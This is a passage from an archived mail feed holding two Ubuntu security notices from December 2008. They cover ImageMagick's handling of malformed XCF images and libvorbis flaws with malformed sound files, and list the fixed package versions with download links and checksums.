This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  imagemagick                     6:6.2.4.5-0.6ubuntu0.8

Ubuntu 7.10:
  imagemagick                     7:6.2.4.5.dfsg1-2ubuntu1.1

After a standard system upgrade you need to restart any applications that
use ImageMagick, such as OpenOffice.org and Inkscape, to effect the
necessary changes.

Details follow:

It was discovered that ImageMagick did not correctly handle certain
malformed XCF images. If a user were tricked into opening a specially
crafted image with an application that uses ImageMagick, an attacker
could cause a denial of service and possibly execute arbitrary code with
the user's privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5-0.6ubuntu0.8.diff.gz
      Size/MD5:    42513 e496b5beeaca8ffaf73792efc552bb75
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5-0.6ubuntu0.8.dsc
      Size/MD5:      922 18af22ef2d20f02bc71a2b4d525101ba
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.orig.tar.gz
      Size/MD5:  6085147 8d790a280f355489d0cfb6d36ce6751f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5-0.6ubuntu0.8_amd64.deb
      Size/MD5:  1616784 e140ab1826153433380bf0e087401ce5
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5-0.6ubuntu0.8_amd64.deb
      Size/MD5:   249840 b52af42a36a2e6aeded4f0e1bdc3c7c5
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5-0.6ubuntu0.8_amd64.deb
      Size/MD5:   170776 f99388b02f4989d6b3d98886ecef69e3
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5-0.6ubuntu0.8_amd64.deb
      Size/MD5:  1705392 9de94091eb1cf8a31b28516c1444cd94
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5-0.6ubuntu0.8_amd64.deb
      Size/MD5:  1349700 a0712e9eefe0c2d2e8e59a5920dd8821
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5-0.6ubuntu0.8_amd64.deb
      Size/MD5:   172600 affa28f951b642bf64cdfdb4153b193d

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5-0.6ubuntu0.8_i386.deb
      Size/MD5:  1615502 34f7ed99bbdaed2247321395623e9e6c
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5-0.6ubuntu0.8_i386.deb
      Size/MD5:   227826 8308c202b96c1960fd352b4a011ba290
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5-0.6ubuntu0.8_i386.deb
      Size/MD5:   169702 1380b74079bf68498434229be87ba197
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5-0.6ubuntu0.8_i386.deb
      Size/MD5:  1558588 edfc14ac9018b3e6f4e303e83af74637
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5-0.6ubuntu0.8_i386.deb
      Size/MD5:  1250130 72e586dfbe9bcb0602a37eadcce574bc
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5-0.6ubuntu0.8_i386.deb
      Size/MD5:   167964 2bc1e8c08d403321df20868c6a646bfd

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5-0.6ubuntu0.8_powerpc.deb
      Size/MD5:  1620342 50b2274fd75d9f8fe2c78d9bb9aad4be
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5-0.6ubuntu0.8_powerpc.deb
      Size/MD5:   252100 d0073b909c9073b4108272cf58724bb2
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5-0.6ubuntu0.8_powerpc.deb
      Size/MD5:   163178 228bf2af722438ff3584bb85075cf956
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5-0.6ubuntu0.8_powerpc.deb
      Size/MD5:  1909532 b7d8d5fbdac11cc2bb8df9faffb6592d
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5-0.6ubuntu0.8_powerpc.deb
      Size/MD5:  1285690 d1a834cc502a2ae7a8c0a805da80fd83
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5-0.6ubuntu0.8_powerpc.deb
      Size/MD5:   166968 8c568ce0d4d7ab9f46e681f0f5c80b8f

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5-0.6ubuntu0.8_sparc.deb
      Size/MD5:  1616114 80af67cc6405b2f9744a66f62ab7e35b
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5-0.6ubuntu0.8_sparc.deb
      Size/MD5:   229934 8069e7cc0272505907654484c0083400
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5-0.6ubuntu0.8_sparc.deb
      Size/MD5:   168044 bec93b0a4e03bf308c0e5e73649c0267
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5-0.6ubuntu0.8_sparc.deb
      Size/MD5:  1810056 df876fb99e74ac4efce39d6292fc7ed1
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5-0.6ubuntu0.8_sparc.deb
      Size/MD5:  1345938 6860ae7d2d44f88534954fa0bb13bf88
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5-0.6ubuntu0.8_sparc.deb
      Size/MD5:   169680 b4484481d95850f256bdb2b74d7d55cb

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1.diff.gz
      Size/MD5:   102763 811963207b510b778d0d7dfe587f51b5
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1.dsc
      Size/MD5:     1161 cdd5a298b1e72c812040be67afcf3133
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1.orig.tar.gz
      Size/MD5:  5203463 2c5d3723d25c4119cf003efce2161c56

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1_amd64.deb
      Size/MD5:   741190 22a0f42c8fe6bf82b7e588a10960c7e6
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5.dfsg1-2ubuntu1.1_amd64.deb
      Size/MD5:   250830 d7fe4b4df55c1ac4f9b4628492e12f38
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5.dfsg1-2ubuntu1.1_amd64.deb
      Size/MD5:   190196 3c81b936c68598a798eeee0e64c11eee
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5.dfsg1-2ubuntu1.1_amd64.deb
      Size/MD5:  1690802 49383fd5daeff5e035e4b31e8d697209
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5.dfsg1-2ubuntu1.1_amd64.deb
      Size/MD5:  1344812 1ff84f6ba161d153669c2078008c60c9
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5.dfsg1-2ubuntu1.1_amd64.deb
      Size/MD5:   174500 c22f3e517108a16ee1cf2f6515cf6a59

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1_i386.deb
      Size/MD5:   740024 1a3c4a2e1a4c08dc88c0021161b27aea
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5.dfsg1-2ubuntu1.1_i386.deb
      Size/MD5:   229606 30526dfa6efafe965c388b2f4bfa2a86
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5.dfsg1-2ubuntu1.1_i386.deb
      Size/MD5:   193348 606db68900dacebf677d179810e72400
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5.dfsg1-2ubuntu1.1_i386.deb
      Size/MD5:  1595204 4e55cb3cd9cf80b3ca1c208e4483baeb
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5.dfsg1-2ubuntu1.1_i386.deb
      Size/MD5:  1299758 a5f58f9b23fc018b3f16d5ef6022d7e9
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5.dfsg1-2ubuntu1.1_i386.deb
      Size/MD5:   170004 33cc347f9ae218ee1cff56038037572b

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1_lpia.deb
      Size/MD5:   740068 b0b07bb6f6cd0013c6cc77d1ddb3c1b9
    http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5.dfsg1-2ubuntu1.1_lpia.deb
      Size/MD5:   231664 05864c90d9a8eef57b1601ce729e2a9f
    http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5.dfsg1-2ubuntu1.1_lpia.deb
      Size/MD5:   189572 dffbb7faddc85df1c040d770daa4bbf3
    http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5.dfsg1-2ubuntu1.1_lpia.deb
      Size/MD5:  1612224 a9ef6f4e75bdba532245861cf885ea44
    http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick9_6.2.4.5.dfsg1-2ubuntu1.1_lpia.deb
      Size/MD5:  1303844 e1d3379589cdce724db0ea694e6ced24
    http://ports.ubuntu.com/pool/universe/i/imagemagick/perlmagick_6.2.4.5.dfsg1-2ubuntu1.1_lpia.deb
      Size/MD5:   174134 983b86da5547223294ba688951168c5b

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1_powerpc.deb
      Size/MD5:   748896 1f782e8b18ef490a011058c1b2856503
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5.dfsg1-2ubuntu1.1_powerpc.deb
      Size/MD5:   253594 c76d8b774405138a6d13f1cf38779a51
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5.dfsg1-2ubuntu1.1_powerpc.deb
      Size/MD5:   202724 c0524feeace6bc5596ddc470cfdebeac
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5.dfsg1-2ubuntu1.1_powerpc.deb
      Size/MD5:  1923526 63ee716b9cd22f6ee313d2e64989d4c8
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5.dfsg1-2ubuntu1.1_powerpc.deb
      Size/MD5:  1358750 5818d6912d7d440f5ffaf80c6dd7dfd3
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5.dfsg1-2ubuntu1.1_powerpc.deb
      Size/MD5:   173422 9a8dda1198866d8f2f9c3a78522e8af2

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.2.4.5.dfsg1-2ubuntu1.1_sparc.deb
      Size/MD5:   741060 b7a79b518707f40a45cb8962406cecab
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.2.4.5.dfsg1-2ubuntu1.1_sparc.deb
      Size/MD5:   230760 af528afb7d77f825fea574a66e528a04
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9c2a_6.2.4.5.dfsg1-2ubuntu1.1_sparc.deb
      Size/MD5:   193168 ce61ffd320fd022743da316b2a889dd3
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.2.4.5.dfsg1-2ubuntu1.1_sparc.deb
      Size/MD5:  1858960 98309e6cca4b1c979a84c022988d271c
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9_6.2.4.5.dfsg1-2ubuntu1.1_sparc.deb
      Size/MD5:  1399932 fb4cde1381eacc9357f52ddd607aef4f
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.2.4.5.dfsg1-2ubuntu1.1_sparc.deb
      Size/MD5:   175946 65ea96b9ebfc22fd9eea8daee44f38d4



--=-drqv0m8JEzs8UbNvWH26
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkk0GqkACgkQLMAs/0C4zNqjdwCdE6vIS+eiAJ9OozJ8pojCdxZ9
GS8An125CLN69MBx+c+qF7wAPhFhAJeX
=n8LC
-----END PGP SIGNATURE-----

--=-drqv0m8JEzs8UbNvWH26--

From - Mon Dec  1 14:45:18 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004bd7
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38788-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id EEAF2EC10C
for <lists@securityspace.com>; Mon,  1 Dec 2008 14:37:59 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 633432373F2; Mon,  1 Dec 2008 11:59:52 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29382 invoked from network); 1 Dec 2008 16:56:20 -0000
Subject: [USN-682-1] libvorbis vulnerabilities
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>,
full-disclosure@lists.grok.org.uk
X-Original-To: marc.deslauriers@cleanmail.canonical.com
X-Mailcontrol-Inbound: 
 uq3drnD2P+ps5SfEb0fvr78+NoP1DHBZwGqKpaXB2eTgNv8D6KLIxb8+NoP1DHBZ8VSaBg0k0xwX-Spam-Score: -13.7
X-Scanned-By: MailControl A_08_51_00 (www.mailcontrol.com) on 10.69.0.173
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-7oAJ0ExbFsnSiyDVIc2/"
Date: Mon, 01 Dec 2008 12:11:59 -0500
Message-Id: <1228151519.9860.4.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.24.1 
Status:   


--=-7oAJ0ExbFsnSiyDVIc2/
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-682-1          December 01, 2008
libvorbis vulnerabilities
CVE-2008-1419, CVE-2008-1420, CVE-2008-1423
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libvorbis0a                     1.1.2-0ubuntu2.3

Ubuntu 7.10:
  libvorbis0a                     1.2.0.dfsg-1ubuntu0.1

Ubuntu 8.04 LTS:
  libvorbis0a                     1.2.0.dfsg-2ubuntu0.1

After a standard system upgrade you need to restart any applications that
use libvorbis, such as Totem and gtkpod, to effect the necessary changes.

Details follow:

It was discovered that libvorbis did not correctly handle certain malformed
sound files. If a user were tricked into opening a specially crafted sound
file with an application that uses libvorbis, an attacker could execute
arbitrary code with the user's privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.1.2-0ubuntu2.3.diff.gz
      Size/MD5:    11735 23f3260732f1b61563011034bf9aff5a
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.1.2-0ubuntu2.3.dsc
      Size/MD5:      706 0758a89dc0616697d3cb128b0f42e475
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.1.2.orig.tar.gz
      Size/MD5:  1316434 37847626b8e1b53ae79a34714c7b3211

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.1.2-0ubuntu2.3_amd64.deb
      Size/MD5:   487988 6ac00dab1115b85c27189621c06c008f
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.1.2-0ubuntu2.3_amd64.deb
      Size/MD5:   101856 0c92f61c2c777cce1d5277ed840fffcc
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.1.2-0ubuntu2.3_amd64.deb
      Size/MD5:   100908 78d05f9a2670e1a87740c9cc629782fd
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.1.2-0ubuntu2.3_amd64.deb
      Size/MD5:    18646 4df2145dff94106c81ee2fcac873a75b

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.1.2-0ubuntu2.3_i386.deb
      Size/MD5:   469316 1f9bdb104c24279d1c92c363640afce1
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.1.2-0ubuntu2.3_i386.deb
      Size/MD5:    96240 844260578e93b48388975720d845c033
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.1.2-0ubuntu2.3_i386.deb
      Size/MD5:    82932 6c614ab9888672510e947f1d246db071
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.1.2-0ubuntu2.3_i386.deb
      Size/MD5:    19584 a206c9c5fb541f709fd4a4dce8c606ca

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.1.2-0ubuntu2.3_powerpc.deb
      Size/MD5:   503692 f929a9177343adbf367e74c0ea5cbee7
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.1.2-0ubuntu2.3_powerpc.deb
      Size/MD5:   106230 f01391134bebdff866c694f14b8be256
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.1.2-0ubuntu2.3_powerpc.deb
      Size/MD5:    86804 5d328592302bc7d23742c0d32d3322f4
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.1.2-0ubuntu2.3_powerpc.deb
      Size/MD5:    22616 921a35c6e272fd4c00a8ed82d2855aca

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.1.2-0ubuntu2.3_sparc.deb
      Size/MD5:   478580 e7b9e3d3444aa9b2516e2de383ad0212
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.1.2-0ubuntu2.3_sparc.deb
      Size/MD5:    99560 c7a45c44998fff502735a1a555c533ef
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.1.2-0ubuntu2.3_sparc.deb
      Size/MD5:    84760 b12349cd58f4c20dd510f7bc4018ceba
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.1.2-0ubuntu2.3_sparc.deb
      Size/MD5:    19434 2865e544cff32fffeb9e5b91d2d9f5b9

Updated packages for Ubuntu 7.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.2.0.dfsg-1ubuntu0.1.diff.gz
      Size/MD5:     6803 eba88f0d5ed7e99f23c390ac5b061aa6
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.2.0.dfsg-1ubuntu0.1.dsc
      Size/MD5:      936 0afaeb24889965a41966dbce3d9bd8e6
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.2.0.dfsg.orig.tar.gz
      Size/MD5:  1477935 3c7fff70c0989ab3c1c85366bf670818

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-1ubuntu0.1_amd64.deb
      Size/MD5:   475590 7a6503ea10ce1550dfa80f4d3cce5fb3
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-1ubuntu0.1_amd64.deb
      Size/MD5:   104288 0c60601a0a2b44caf7789c6d4a20965e
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-1ubuntu0.1_amd64.deb
      Size/MD5:    94172 f617ece4bdf424c66614e1ed29e1e3b0
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-1ubuntu0.1_amd64.deb
      Size/MD5:    19202 a1831a3dd4389bff251d4aa9a127a80e

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-1ubuntu0.1_i386.deb
      Size/MD5:   455008 d98ab2c958d7ab2afaefed5084cf7d57
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-1ubuntu0.1_i386.deb
      Size/MD5:    99594 0fd621c1950703339239f5aed7f4c805
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-1ubuntu0.1_i386.deb
      Size/MD5:    75998 3843a868a9bfc8f330270e5ea966b753
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-1ubuntu0.1_i386.deb
      Size/MD5:    20064 a69d1699effba03d8de9b98ddbcb9748

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-1ubuntu0.1_lpia.deb
      Size/MD5:   457286 030878c8e2394ce9ecd92c03de803098
    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-1ubuntu0.1_lpia.deb
      Size/MD5:   100054 68f25494c3ec5217af8263d60b67915b
    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-1ubuntu0.1_lpia.deb
      Size/MD5:    76134 68219cdf66ec0aa276c695fface59427
    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-1ubuntu0.1_lpia.deb
      Size/MD5:    19900 8e45f8dc189f83d860066975e178712e

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-1ubuntu0.1_powerpc.deb
      Size/MD5:   484714 a6c8845587f6a2b27e054dac925340b3
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-1ubuntu0.1_powerpc.deb
      Size/MD5:   109326 dced4c6926117ed364d36b83ebc5722a
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-1ubuntu0.1_powerpc.deb
      Size/MD5:    83698 6f2af6040278913dae5e595fbe2de6c1
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-1ubuntu0.1_powerpc.deb
      Size/MD5:    23756 4f74ee6f4f17466807770592e4cc1262

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-1ubuntu0.1_sparc.deb
      Size/MD5:   462312 f378e16a892a6613391579ebd78a1cb8
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-1ubuntu0.1_sparc.deb
      Size/MD5:   100548 fa60ade69e538ab433a4f29c39d47626
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-1ubuntu0.1_sparc.deb
      Size/MD5:    80566 992176befcc1e4b0f5c9e8623446d388
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-1ubuntu0.1_sparc.deb
      Size/MD5:    19260 42b606b63d8d534776b805cd089e7208

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.2.0.dfsg-2ubuntu0.1.diff.gz
      Size/MD5:     6859 229d235964b97a77019007f465e6be12
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.2.0.dfsg-2ubuntu0.1.dsc
      Size/MD5:      936 cb80528452572db8df019ee48022bfec
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis_1.2.0.dfsg.orig.tar.gz
      Size/MD5:  1477935 3c7fff70c0989ab3c1c85366bf670818

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-2ubuntu0.1_amd64.deb
      Size/MD5:   474602 019214230eddd04a756dcd6eb206f4d5
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-2ubuntu0.1_amd64.deb
      Size/MD5:   103554 105de05b983d65a404f60af6eea67e68
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-2ubuntu0.1_amd64.deb
      Size/MD5:    94216 c6c2e356c2dc96d4af547fb2a1dd5b34
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-2ubuntu0.1_amd64.deb
      Size/MD5:    18928 82c4d54a4f30c7e41da333543e2d1370

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-2ubuntu0.1_i386.deb
      Size/MD5:   455286 75d65fe98e008eb426c47822221b8903
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-2ubuntu0.1_i386.deb
      Size/MD5:    98426 3d03860f8b0271c7f04e5eb5681800b9
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-2ubuntu0.1_i386.deb
      Size/MD5:    76012 2190470c51c85850e153416e10cb9583
    http://security.ubuntu.com/ubuntu/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-2ubuntu0.1_i386.deb
      Size/MD5:    19782 943c8d8a7b3cbface595f47b87d4129e

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-2ubuntu0.1_lpia.deb
      Size/MD5:   457272 6b6c65e2e8a4883c567723a31c970909
    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-2ubuntu0.1_lpia.deb
      Size/MD5:    99072 af5d515bb4159f811df31789606cf6fa
    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisenc2_1.2.0.dfsg-2ubuntu0.1_lpia.deb
      Size/MD5:    76154 39f582ff09a3e43c6690ece11c1272de
    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbisfile3_1.2.0.dfsg-2ubuntu0.1_lpia.deb
      Size/MD5:    19778 2482fd35cdcfaf93af997a11f2277859

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis-dev_1.2.0.dfsg-2ubuntu0.1_powerpc.deb
      Size/MD5:   484204 128ddaebf7ab8c95288de20b309b7b39
    http://ports.ubuntu.com/pool/main/libv/libvorbis/libvorbis0a_1.2.0.dfsg-2ubuntu0.1_powerpc.deb
      Size/MD5:   108516 a15c110e58da00ce9e851f8f04909673
